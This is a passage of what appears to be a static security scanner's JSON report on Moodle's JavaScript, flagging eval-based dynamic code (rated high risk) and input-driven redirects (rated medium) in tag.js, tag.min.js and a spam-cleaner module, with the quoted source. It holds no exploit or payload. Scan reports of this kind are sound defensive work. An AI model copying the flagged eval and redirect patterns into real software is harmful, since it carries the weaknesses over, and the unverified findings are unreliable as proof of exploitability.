+ elementIndex + ' = new Object();');\n eval(subelement + '.' + elementIndex + '._count = 0;');\n }\n if (elementIndexes[i + 1] == eval(subelement + '.' + elementIndex + '._count')) {\n eval(subelement + '.' + elementIndex + '._count++;');\n }\n", "vulnerId": "APPCUT:62:14430", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionCode.html", "positionInStartLine": 48, "patternDescription": "This vulnerability occurs when the application does not properly filter external data when making a call to the API. As a result, the user can form his inputs in a way that forces the application to perform actions, not accounted for by the developer.", "appercutVulnerName": "Incorrect User Input Filtration when Generating Code on the Fly", "endLineNumber": 304, "positionInEndLine": 102, "startLineNumber": 304, "patternCodeLanguage": "JavaScript", "appercutRisk": "HIGH"}]}, {"pageNumber": 14, "vulnerabilities": [{"sourceFileName": "moodle/admin/tool/spamcleaner/module.js", "code": " } catch(e) {\n alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner'));\n return;\n }\n if (resp == true) {\n window.location.href=window.location.href;\n }\n }\n }\n };\n context.Y.io(context.me+'?delall=yes&sesskey='+M.cfg.sesskey, cfg);\n", "vulnerId": "APPCUT:62:14423", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n );\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 308, "positionInStartLine": 32, "positionInEndLine": 127, "appercutAttackItemId": 8935, "startLineNumber": 308}, {"sourceFileName": "moodle/lib/amd/build/tag.min.js", "code": "define([\"jquery\",\"core/ajax\",\"core/templates\",\"core/notification\",\"core/str\"],function(a,b,c,d,e){return{initTagindexPage:function(){a(\"body\").delegate(\".tagarea[data-ta] a[data-quickload=1]\",\"click\",function(d){d.preventDefault();var e=a(this),f=e.context.search.replace(/^\\?/,\"\"),g=e.closest(\".tagarea[data-ta]\"),h=f.split(\"&\").reduce(function(a,b){var c=b.split(\"=\");return a[c[0]]=decodeURIComponent(c[1]),a},{}),i=b.call([{methodname:\"core_tag_get_tagindex\",args:{tagindex:h}}],!0);a.when.apply(a,i).done(function(a){c.render(\"core_tag/index\",a).done(function(a){g.replaceWith(a)})})})},initManagePage:function(){a(\"body\").on(\"updated\",\"[data-inplaceeditable]\",function(b){if(e.get_string(\"now\").done(function(c){a(b.target).closest(\"tr\").find(\"td.col-timemodified\").html(c)}),\"tagflag\"===b.ajaxreturn.itemtype){var c=a(b.target).closest(\"tr\");\"0\"===b.ajaxreturn.value?c.removeClass(\"flagged-tag\"):c.addClass(\"flagged-tag\")}}),a(\".tag-management-table\").delegate(\"a.tagdelete\",\"click\",function(b){b.preventDefault();var c=a(this).attr(\"href\");e.get_strings([{key:\"delete\"},{key:\"confirmdeletetag\",component:\"tag\"},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){window.location.href=c})})}),a(\"#tag-management-delete\").click(function(b){var c=a(this).closest(\"form\").get(0),f=a(c).find(\"input[type=checkbox]:checked\").length;if(!f)return!1;var g=a(\"<input type='hidden'/>\").attr(\"name\",this.name);b.preventDefault(),e.get_strings([{key:\"delete\"},{key:\"confirmdeletetags\",component:\"tag\"},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){g.appendTo(c),c.submit()})})}),a(\"#tag-management-combine\").click(function(b){b.preventDefault();var c=a(this).closest(\"form\").get(0),f=a(c).find(\"input[type=checkbox]:checked\");if(f.length<=1)return e.get_strings([{key:\"combineselected\",component:\"tag\"},{key:\"selectmultipletags\",component:\"tag\"},{key:\"ok\"}]).done(function(a){d.alert(a[0],a[1],a[2])}),!1;var g=a(\"<input type='hidden'/>\").attr(\"name\",this.name);e.get_strings([{key:\"combineselected\",component:\"tag\"},{key:\"selectmaintag\",component:\"tag\"},{key:\"continue\"},{key:\"cancel\"}]).done(function(b){var d=a('<div><form id=\"combinetags_form\" class=\"form-inline\"><p class=\"description\"></p><p class=\"options\"></p><p class=\"mdl-align\"><input type=\"submit\" id=\"combinetags_submit\"/><input type=\"button\" id=\"combinetags_cancel\"/></p></form></div>');d.find(\".description\").html(b[1]),d.find(\"#combinetags_submit\").attr(\"value\",b[2]),d.find(\"#combinetags_cancel\").attr(\"value\",b[3]);var e=d.find(\".options\");f.each(function(){var b=a(this).val(),c=a(\".inplaceeditable[data-itemtype=tagname][data-itemid=\"+b+\"]\").attr(\"data-value\");e.append(a('<input type=\"radio\" name=\"maintag\" id=\"combinetags_maintag_'+b+'\" value=\"'+b+'\"/><label for=\"combinetags_maintag_'+b+'\">'+c+\"</label><br>\"))});var h=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:d.html()});h.show(),a(\"#combinetags_form input[type=radio]\").first().focus().prop(\"checked\",!0),a(\"#combinetags_form #combinetags_cancel\").on(\"click\",function(){h.destroy()}),a(\"#combinetags_form\").on(\"submit\",function(){g.appendTo(c);var b=a(\"input[name=maintag]:checked\",\"#combinetags_form\").val();return a(\"<input type='hidden'/>\").attr(\"name\",\"maintag\").attr(\"value\",b).appendTo(c),c.submit(),!1})})}),a(\"body\").on(\"updatefailed\",\"[data-inplaceeditable][data-itemtype=tagname]\",function(b){var c=b.exception,f=b.newvalue,g=a(b.target).attr(\"data-itemid\");\"namesalreadybeeingused\"===c.errorcode&&(b.preventDefault(),e.get_strings([{key:\"nameuseddocombine\",component:\"tag\"},{key:\"yes\"},{key:\"cancel\"}]).done(function(a){d.confirm(b.message,a[0],a[1],a[2],function(){window.location.href=window.location.href+\"&newname=\"+encodeURIComponent(f)+\"&tagid=\"+encodeURIComponent(g)+\"&action=renamecombine&sesskey=\"+M.cfg.sesskey})}))}),a(\"body\").on(\"click\",\"a[data-action=addstandardtag]\",function(b){b.preventDefault(),e.get_strings([{key:\"addotags\",component:\"tag\"},{key:\"inputstandardtags\",component:\"tag\"},{key:\"continue\"},{key:\"cancel\"}]).done(function(b){var c=a('<div><form id=\"addtags_form\" class=\"form-inline\" method=\"POST\"><input type=\"hidden\" name=\"action\" value=\"addstandardtag\"/><input type=\"hidden\" name=\"sesskey\" value=\"'+M.cfg.sesskey+'\"/><p><label for=\"id_tagslist\">'+b[1]+'</label><input type=\"text\" id=\"id_tagslist\" name=\"tagslist\"/></p><p class=\"mdl-align\"><input type=\"submit\" id=\"addtags_submit\"/><input type=\"button\" id=\"addtags_cancel\"/></p></form></div>');c.find(\"#addtags_form\").attr(\"action\",window.location.href),c.find(\"#addtags_submit\").attr(\"value\",b[2]),c.find(\"#addtags_cancel\").attr(\"value\",b[3]);var d=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:c.html()});d.show(),a(\"#addtags_form input[type=text]\").focus(),a(\"#addtags_form #addtags_cancel\").on(\"click\",function(){d.destroy()})})})},initManageCollectionsPage:function(){a(\"body\").on(\"updated\",\"[data-inplaceeditable]\",function(b){var c,d,e,f=b.ajaxreturn;\"core_tag\"===f.component&&\"tagareaenable\"===f.itemtype&&(c=a(this).attr(\"data-itemid\"),a(\".tag-collections-table ul[data-collectionid] li[data-areaid=\"+c+\"]\").addClass(\"hidden\"),e=f.value,\"1\"===e?(a(this).closest(\"tr\").removeClass(\"dimmed_text\"),d=a(this).closest(\"tr\").find('[data-itemtype=\"tagareacollection\"]').attr(\"data-value\"),a(\".tag-collections-table ul[data-collectionid=\"+d+\"] li[data-areaid=\"+c+\"]\").removeClass(\"hidden\")):a(this).closest(\"tr\").addClass(\"dimmed_text\")),\"core_tag\"===f.component&&\"tagareacollection\"===f.itemtype&&(c=a(this).attr(\"data-itemid\"),a(\".tag-collections-table ul[data-collectionid] li[data-areaid=\"+c+\"]\").addClass(\"hidden\"),d=a(this).attr(\"data-value\"),e=a(this).closest(\"tr\").find('[data-itemtype=\"tagareaenable\"]').attr(\"data-value\"),\"1\"===e&&a(\".tag-collections-table ul[data-collectionid=\"+d+\"] li[data-areaid=\"+c+\"]\").removeClass(\"hidden\"))}),a(\"body\").on(\"click\",\".addtagcoll > a\",function(b){b.preventDefault();var c=a(this).attr(\"data-url\")+\"&sesskey=\"+M.cfg.sesskey;e.get_strings([{key:\"addtagcoll\",component:\"tag\"},{key:\"name\"},{key:\"searchable\",component:\"tag\"},{key:\"create\"},{key:\"cancel\"}]).done(function(b){var d=a('<div><form id=\"addtagcoll_form\" class=\"form-inline\"><p><label for=\"addtagcoll_name\"></label>: <input id=\"addtagcoll_name\" type=\"text\"/></p><p><label for=\"addtagcoll_searchable\"></label>: <input id=\"addtagcoll_searchable\" type=\"checkbox\" value=\"1\" checked/></p><p class=\"mdl-align\"><input type=\"submit\" id=\"addtagcoll_submit\"/><input type=\"button\" id=\"addtagcoll_cancel\"/></p></form></div>');d.find('label[for=\"addtagcoll_name\"]').html(b[1]),d.find('label[for=\"addtagcoll_searchable\"]').html(b[2]),d.find(\"#addtagcoll_submit\").attr(\"value\",b[3]),d.find(\"#addtagcoll_cancel\").attr(\"value\",b[4]);var e=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:d.html()});e.show(),a(\"#addtagcoll_form #addtagcoll_name\").focus(),a(\"#addtagcoll_form #addtagcoll_cancel\").on(\"click\",function(){e.destroy()}),a(\"#addtagcoll_form\").on(\"submit\",function(){var b=a(\"#addtagcoll_form #addtagcoll_name\").val(),d=a(\"#addtagcoll_form #addtagcoll_searchable\").prop(\"checked\")?1:0;return String(b).length>0&&(window.location.href=c+\"&name=\"+encodeURIComponent(b)+\"&searchable=\"+d),!1})})}),a(\"body\").on(\"click\",\".tag-collections-table .action_delete\",function(b){b.preventDefault();var c=a(this).attr(\"data-url\")+\"&sesskey=\"+M.cfg.sesskey;e.get_strings([{key:\"delete\"},{key:\"suredeletecoll\",component:\"tag\",param:a(this).attr(\"data-collname\")},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){window.location.href=c})})})}}});\n", "functionName": "--AnonymousClass--moodle_lib_amd_build_tag_min_1_104::Anonymous_moodle_lib_amd_build_tag_min_1_3709", "endLineNumber": 1, "positionInStartLine": 3712, "positionInEndLine": 3866, "appercutAttackItemId": 8936, "startLineNumber": 1}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " panel.destroy();\n });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 307, "positionInStartLine": 38, "positionInEndLine": 44, "appercutAttackItemId": 8934, "startLineNumber": 307}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " {key : 'nameuseddocombine', component : 'tag'},\n {key : 'yes'},\n {key : 'cancel'},\n ]).done(function(s) {\n notification.confirm(e.message, s[0], s[1], s[2], function() {\n window.location.href = window.location.href + \"&newname=\" + encodeURIComponent(newvalue) +\n \"&tagid=\" + encodeURIComponent(tagid) +\n '&action=renamecombine&sesskey=' + M.cfg.sesskey;\n });\n });\n }\n });\n\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_191_82", "endLineNumber": 194, "positionInStartLine": 28, "positionInEndLine": 80, "appercutAttackItemId": 8937, "startLineNumber": 192}, {"sourceFileName": "moodle/admin/tool/spamcleaner/module.js", "code": " } catch(e) {\n alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner'));\n return;\n }\n if (resp == true) {\n window.location.href=window.location.href;\n }\n }\n }\n };\n context.Y.io(context.me+'?delall=yes&sesskey='+M.cfg.sesskey, cfg);\n", "functionName": "--AnonymousClass--moodle_admin_tool_spamcleaner_module_1_21.cfg.--AnonymousClass--moodle_admin_tool_spamcleaner_module_13_20::Anonymous_moodle_admin_tool_spamcleaner_module_14_38", "endLineNumber": 22, "positionInStartLine": 28, "positionInEndLine": 69, "appercutAttackItemId": 8938, "startLineNumber": 22}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " $('#addtagcoll_form #addtagcoll_name').focus();\n $('#addtagcoll_form #addtagcoll_cancel').on('click', function() {\n panel.destroy();\n });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 305, "positionInStartLine": 32, "positionInEndLine": 83, "appercutAttackItemId": 8933, "startLineNumber": 305}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionRedirect.html", "positionInStartLine": 28, "patternDescription": "If the application redirects users to webpages based on input parameters, the malicious user can sometimes control the destination address.", "appercutVulnerName": "Redirecting the User to a Malicious Site", "endLineNumber": 22, "positionInEndLine": 69, "startLineNumber": 22, "patternCodeLanguage": "JavaScript", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/amd/build/tag.min.js", "code": "define([\"jquery\",\"core/ajax\",\"core/templates\",\"core/notification\",\"core/str\"],function(a,b,c,d,e){return{initTagindexPage:function(){a(\"body\").delegate(\".tagarea[data-ta] a[data-quickload=1]\",\"click\",function(d){d.preventDefault();var e=a(this),f=e.context.search.replace(/^\\?/,\"\"),g=e.closest(\".tagarea[data-ta]\"),h=f.split(\"&\").reduce(function(a,b){var c=b.split(\"=\");return a[c[0]]=decodeURIComponent(c[1]),a},{}),i=b.call([{methodname:\"core_tag_get_tagindex\",args:{tagindex:h}}],!0);a.when.apply(a,i).done(function(a){c.render(\"core_tag/index\",a).done(function(a){g.replaceWith(a)})})})},initManagePage:function(){a(\"body\").on(\"updated\",\"[data-inplaceeditable]\",function(b){if(e.get_string(\"now\").done(function(c){a(b.target).closest(\"tr\").find(\"td.col-timemodified\").html(c)}),\"tagflag\"===b.ajaxreturn.itemtype){var c=a(b.target).closest(\"tr\");\"0\"===b.ajaxreturn.value?c.removeClass(\"flagged-tag\"):c.addClass(\"flagged-tag\")}}),a(\".tag-management-table\").delegate(\"a.tagdelete\",\"click\",function(b){b.preventDefault();var c=a(this).attr(\"href\");e.get_strings([{key:\"delete\"},{key:\"confirmdeletetag\",component:\"tag\"},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){window.location.href=c})})}),a(\"#tag-management-delete\").click(function(b){var c=a(this).closest(\"form\").get(0),f=a(c).find(\"input[type=checkbox]:checked\").length;if(!f)return!1;var g=a(\"<input type='hidden'/>\").attr(\"name\",this.name);b.preventDefault(),e.get_strings([{key:\"delete\"},{key:\"confirmdeletetags\",component:\"tag\"},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){g.appendTo(c),c.submit()})})}),a(\"#tag-management-combine\").click(function(b){b.preventDefault();var c=a(this).closest(\"form\").get(0),f=a(c).find(\"input[type=checkbox]:checked\");if(f.length<=1)return e.get_strings([{key:\"combineselected\",component:\"tag\"},{key:\"selectmultipletags\",component:\"tag\"},{key:\"ok\"}]).done(function(a){d.alert(a[0],a[1],a[2])}),!1;var g=a(\"<input type='hidden'/>\").attr(\"name\",this.name);e.get_strings([{key:\"combineselected\",component:\"tag\"},{key:\"selectmaintag\",component:\"tag\"},{key:\"continue\"},{key:\"cancel\"}]).done(function(b){var d=a('<div><form id=\"combinetags_form\" class=\"form-inline\"><p class=\"description\"></p><p class=\"options\"></p><p class=\"mdl-align\"><input type=\"submit\" id=\"combinetags_submit\"/><input type=\"button\" id=\"combinetags_cancel\"/></p></form></div>');d.find(\".description\").html(b[1]),d.find(\"#combinetags_submit\").attr(\"value\",b[2]),d.find(\"#combinetags_cancel\").attr(\"value\",b[3]);var e=d.find(\".options\");f.each(function(){var b=a(this).val(),c=a(\".inplaceeditable[data-itemtype=tagname][data-itemid=\"+b+\"]\").attr(\"data-value\");e.append(a('<input type=\"radio\" name=\"maintag\" id=\"combinetags_maintag_'+b+'\" value=\"'+b+'\"/><label for=\"combinetags_maintag_'+b+'\">'+c+\"</label><br>\"))});var h=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:d.html()});h.show(),a(\"#combinetags_form input[type=radio]\").first().focus().prop(\"checked\",!0),a(\"#combinetags_form #combinetags_cancel\").on(\"click\",function(){h.destroy()}),a(\"#combinetags_form\").on(\"submit\",function(){g.appendTo(c);var b=a(\"input[name=maintag]:checked\",\"#combinetags_form\").val();return a(\"<input type='hidden'/>\").attr(\"name\",\"maintag\").attr(\"value\",b).appendTo(c),c.submit(),!1})})}),a(\"body\").on(\"updatefailed\",\"[data-inplaceeditable][data-itemtype=tagname]\",function(b){var c=b.exception,f=b.newvalue,g=a(b.target).attr(\"data-itemid\");\"namesalreadybeeingused\"===c.errorcode&&(b.preventDefault(),e.get_strings([{key:\"nameuseddocombine\",component:\"tag\"},{key:\"yes\"},{key:\"cancel\"}]).done(function(a){d.confirm(b.message,a[0],a[1],a[2],function(){window.location.href=window.location.href+\"&newname=\"+encodeURIComponent(f)+\"&tagid=\"+encodeURIComponent(g)+\"&action=renamecombine&sesskey=\"+M.cfg.sesskey})}))}),a(\"body\").on(\"click\",\"a[data-action=addstandardtag]\",function(b){b.preventDefault(),e.get_strings([{key:\"addotags\",component:\"tag\"},{key:\"inputstandardtags\",component:\"tag\"},{key:\"continue\"},{key:\"cancel\"}]).done(function(b){var c=a('<div><form id=\"addtags_form\" class=\"form-inline\" method=\"POST\"><input type=\"hidden\" name=\"action\" value=\"addstandardtag\"/><input type=\"hidden\" name=\"sesskey\" value=\"'+M.cfg.sesskey+'\"/><p><label for=\"id_tagslist\">'+b[1]+'</label><input type=\"text\" id=\"id_tagslist\" name=\"tagslist\"/></p><p class=\"mdl-align\"><input type=\"submit\" id=\"addtags_submit\"/><input type=\"button\" id=\"addtags_cancel\"/></p></form></div>');c.find(\"#addtags_form\").attr(\"action\",window.location.href),c.find(\"#addtags_submit\").attr(\"value\",b[2]),c.find(\"#addtags_cancel\").attr(\"value\",b[3]);var d=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:c.html()});d.show(),a(\"#addtags_form input[type=text]\").focus(),a(\"#addtags_form #addtags_cancel\").on(\"click\",function(){d.destroy()})})})},initManageCollectionsPage:function(){a(\"body\").on(\"updated\",\"[data-inplaceeditable]\",function(b){var c,d,e,f=b.ajaxreturn;\"core_tag\"===f.component&&\"tagareaenable\"===f.itemtype&&(c=a(this).attr(\"data-itemid\"),a(\".tag-collections-table ul[data-collectionid] li[data-areaid=\"+c+\"]\").addClass(\"hidden\"),e=f.value,\"1\"===e?(a(this).closest(\"tr\").removeClass(\"dimmed_text\"),d=a(this).closest(\"tr\").find('[data-itemtype=\"tagareacollection\"]').attr(\"data-value\"),a(\".tag-collections-table ul[data-collectionid=\"+d+\"] li[data-areaid=\"+c+\"]\").removeClass(\"hidden\")):a(this).closest(\"tr\").addClass(\"dimmed_text\")),\"core_tag\"===f.component&&\"tagareacollection\"===f.itemtype&&(c=a(this).attr(\"data-itemid\"),a(\".tag-collections-table ul[data-collectionid] li[data-areaid=\"+c+\"]\").addClass(\"hidden\"),d=a(this).attr(\"data-value\"),e=a(this).closest(\"tr\").find('[data-itemtype=\"tagareaenable\"]').attr(\"data-value\"),\"1\"===e&&a(\".tag-collections-table ul[data-collectionid=\"+d+\"] li[data-areaid=\"+c+\"]\").removeClass(\"hidden\"))}),a(\"body\").on(\"click\",\".addtagcoll > a\",function(b){b.preventDefault();var c=a(this).attr(\"data-url\")+\"&sesskey=\"+M.cfg.sesskey;e.get_strings([{key:\"addtagcoll\",component:\"tag\"},{key:\"name\"},{key:\"searchable\",component:\"tag\"},{key:\"create\"},{key:\"cancel\"}]).done(function(b){var d=a('<div><form id=\"addtagcoll_form\" class=\"form-inline\"><p><label for=\"addtagcoll_name\"></label>: <input id=\"addtagcoll_name\" type=\"text\"/></p><p><label for=\"addtagcoll_searchable\"></label>: <input id=\"addtagcoll_searchable\" type=\"checkbox\" value=\"1\" checked/></p><p class=\"mdl-align\"><input type=\"submit\" id=\"addtagcoll_submit\"/><input type=\"button\" id=\"addtagcoll_cancel\"/></p></form></div>');d.find('label[for=\"addtagcoll_name\"]').html(b[1]),d.find('label[for=\"addtagcoll_searchable\"]').html(b[2]),d.find(\"#addtagcoll_submit\").attr(\"value\",b[3]),d.find(\"#addtagcoll_cancel\").attr(\"value\",b[4]);var e=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:d.html()});e.show(),a(\"#addtagcoll_form #addtagcoll_name\").focus(),a(\"#addtagcoll_form #addtagcoll_cancel\").on(\"click\",function(){e.destroy()}),a(\"#addtagcoll_form\").on(\"submit\",function(){var b=a(\"#addtagcoll_form #addtagcoll_name\").val(),d=a(\"#addtagcoll_form #addtagcoll_searchable\").prop(\"checked\")?1:0;return String(b).length>0&&(window.location.href=c+\"&name=\"+encodeURIComponent(b)+\"&searchable=\"+d),!1})})}),a(\"body\").on(\"click\",\".tag-collections-table .action_delete\",function(b){b.preventDefault();var c=a(this).attr(\"data-url\")+\"&sesskey=\"+M.cfg.sesskey;e.get_strings([{key:\"delete\"},{key:\"suredeletecoll\",component:\"tag\",param:a(this).attr(\"data-collname\")},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){window.location.href=c})})})}}});\n", "vulnerId": "APPCUT:62:14436", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " panel.destroy();\n });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 307, "positionInStartLine": 38, "positionInEndLine": 44, "appercutAttackItemId": 8946, "startLineNumber": 307}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " $('#addtagcoll_form #addtagcoll_name').focus();\n $('#addtagcoll_form #addtagcoll_cancel').on('click', function() {\n panel.destroy();\n });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 305, "positionInStartLine": 32, "positionInEndLine": 83, "appercutAttackItemId": 8945, "startLineNumber": 305}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n );\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 308, "positionInStartLine": 32, "positionInEndLine": 127, "appercutAttackItemId": 8947, "startLineNumber": 308}, {"sourceFileName": "moodle/lib/amd/build/tag.min.js", "code": "define([\"jquery\",\"core/ajax\",\"core/templates\",\"core/notification\",\"core/str\"],function(a,b,c,d,e){return{initTagindexPage:function(){a(\"body\").delegate(\".tagarea[data-ta] a[data-quickload=1]\",\"click\",function(d){d.preventDefault();var e=a(this),f=e.context.search.replace(/^\\?/,\"\"),g=e.closest(\".tagarea[data-ta]\"),h=f.split(\"&\").reduce(function(a,b){var c=b.split(\"=\");return a[c[0]]=decodeURIComponent(c[1]),a},{}),i=b.call([{methodname:\"core_tag_get_tagindex\",args:{tagindex:h}}],!0);a.when.apply(a,i).done(function(a){c.render(\"core_tag/index\",a).done(function(a){g.replaceWith(a)})})})},initManagePage:function(){a(\"body\").on(\"updated\",\"[data-inplaceeditable]\",function(b){if(e.get_string(\"now\").done(function(c){a(b.target).closest(\"tr\").find(\"td.col-timemodified\").html(c)}),\"tagflag\"===b.ajaxreturn.itemtype){var c=a(b.target).closest(\"tr\");\"0\"===b.ajaxreturn.value?c.removeClass(\"flagged-tag\"):c.addClass(\"flagged-tag\")}}),a(\".tag-management-table\").delegate(\"a.tagdelete\",\"click\",function(b){b.preventDefault();var c=a(this).attr(\"href\");e.get_strings([{key:\"delete\"},{key:\"confirmdeletetag\",component:\"tag\"},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){window.location.href=c})})}),a(\"#tag-management-delete\").click(function(b){var c=a(this).closest(\"form\").get(0),f=a(c).find(\"input[type=checkbox]:checked\").length;if(!f)return!1;var g=a(\"<input type='hidden'/>\").attr(\"name\",this.name);b.preventDefault(),e.get_strings([{key:\"delete\"},{key:\"confirmdeletetags\",component:\"tag\"},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){g.appendTo(c),c.submit()})})}),a(\"#tag-management-combine\").click(function(b){b.preventDefault();var c=a(this).closest(\"form\").get(0),f=a(c).find(\"input[type=checkbox]:checked\");if(f.length<=1)return e.get_strings([{key:\"combineselected\",component:\"tag\"},{key:\"selectmultipletags\",component:\"tag\"},{key:\"ok\"}]).done(function(a){d.alert(a[0],a[1],a[2])}),!1;var g=a(\"<input type='hidden'/>\").attr(\"name\",this.name);e.get_strings([{key:\"combineselected\",component:\"tag\"},{key:\"selectmaintag\",component:\"tag\"},{key:\"continue\"},{key:\"cancel\"}]).done(function(b){var d=a('<div><form id=\"combinetags_form\" class=\"form-inline\"><p class=\"description\"></p><p class=\"options\"></p><p class=\"mdl-align\"><input type=\"submit\" id=\"combinetags_submit\"/><input type=\"button\" id=\"combinetags_cancel\"/></p></form></div>');d.find(\".description\").html(b[1]),d.find(\"#combinetags_submit\").attr(\"value\",b[2]),d.find(\"#combinetags_cancel\").attr(\"value\",b[3]);var e=d.find(\".options\");f.each(function(){var b=a(this).val(),c=a(\".inplaceeditable[data-itemtype=tagname][data-itemid=\"+b+\"]\").attr(\"data-value\");e.append(a('<input type=\"radio\" name=\"maintag\" id=\"combinetags_maintag_'+b+'\" value=\"'+b+'\"/><label for=\"combinetags_maintag_'+b+'\">'+c+\"</label><br>\"))});var h=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:d.html()});h.show(),a(\"#combinetags_form input[type=radio]\").first().focus().prop(\"checked\",!0),a(\"#combinetags_form #combinetags_cancel\").on(\"click\",function(){h.destroy()}),a(\"#combinetags_form\").on(\"submit\",function(){g.appendTo(c);var b=a(\"input[name=maintag]:checked\",\"#combinetags_form\").val();return a(\"<input type='hidden'/>\").attr(\"name\",\"maintag\").attr(\"value\",b).appendTo(c),c.submit(),!1})})}),a(\"body\").on(\"updatefailed\",\"[data-inplaceeditable][data-itemtype=tagname]\",function(b){var c=b.exception,f=b.newvalue,g=a(b.target).attr(\"data-itemid\");\"namesalreadybeeingused\"===c.errorcode&&(b.preventDefault(),e.get_strings([{key:\"nameuseddocombine\",component:\"tag\"},{key:\"yes\"},{key:\"cancel\"}]).done(function(a){d.confirm(b.message,a[0],a[1],a[2],function(){window.location.href=window.location.href+\"&newname=\"+encodeURIComponent(f)+\"&tagid=\"+encodeURIComponent(g)+\"&action=renamecombine&sesskey=\"+M.cfg.sesskey})}))}),a(\"body\").on(\"click\",\"a[data-action=addstandardtag]\",function(b){b.preventDefault(),e.get_strings([{key:\"addotags\",component:\"tag\"},{key:\"inputstandardtags\",component:\"tag\"},{key:\"continue\"},{key:\"cancel\"}]).done(function(b){var c=a('<div><form id=\"addtags_form\" class=\"form-inline\" method=\"POST\"><input type=\"hidden\" name=\"action\" value=\"addstandardtag\"/><input type=\"hidden\" name=\"sesskey\" value=\"'+M.cfg.sesskey+'\"/><p><label for=\"id_tagslist\">'+b[1]+'</label><input type=\"text\" id=\"id_tagslist\" name=\"tagslist\"/></p><p class=\"mdl-align\"><input type=\"submit\" id=\"addtags_submit\"/><input type=\"button\" id=\"addtags_cancel\"/></p></form></div>');c.find(\"#addtags_form\").attr(\"action\",window.location.href),c.find(\"#addtags_submit\").attr(\"value\",b[2]),c.find(\"#addtags_cancel\").attr(\"value\",b[3]);var d=new 